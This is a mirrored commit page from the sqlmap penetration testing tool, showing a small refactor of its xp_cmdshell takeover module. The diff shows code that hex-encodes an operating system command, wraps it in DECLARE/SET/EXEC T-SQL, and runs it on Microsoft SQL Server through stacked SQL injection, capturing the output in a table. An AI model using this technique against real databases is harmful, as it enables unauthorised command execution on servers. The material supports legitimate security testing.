sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 17:46:37 +03:00
Code Issues Packages Projects Releases Wiki Activity

Some refactoring (reusing xpCmdshellForgeCmd)

Browse Source
This commit is contained in:
Miroslav Stampar 2012-07-07 10:51:29 +02:00
parent 8620767b77
commit 58f6687194
1 changed files with 4 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
lib/takeover/xp_cmdshell.py
View File

@ -141,11 +141,13 @@ class xp_cmdshell:
if cmd: if cmd:
self.xpCmdshellExecCmd(cmd) self.xpCmdshellExecCmd(cmd)
def xpCmdshellForgeCmd(self, cmd): def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
self.__randStr = randomStr(lowercase=True) self.__randStr = randomStr(lowercase=True)
self.__cmd = "0x%s" % hexencode(cmd) self.__cmd = "0x%s" % hexencode(cmd)
self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr
self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd) self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
if insertIntoTable:
self.__forgedCmd += "INSERT INTO %s " % insertIntoTable
self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr) self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
return agent.runAsDBMSUser(self.__forgedCmd) return agent.runAsDBMSUser(self.__forgedCmd)
@ -169,7 +171,7 @@ class xp_cmdshell:
output = new_output output = new_output
else: else:
inject.goStacked("INSERT INTO %s EXEC %s '%s'" % (self.cmdTblName, self.xpCmdshellStr, cmd)) inject.goStacked(self.xpCmdshellForgeCmd(cmd, self.cmdTblName))
output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False) output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False)
inject.goStacked("DELETE FROM %s" % self.cmdTblName) inject.goStacked("DELETE FROM %s" % self.cmdTblName)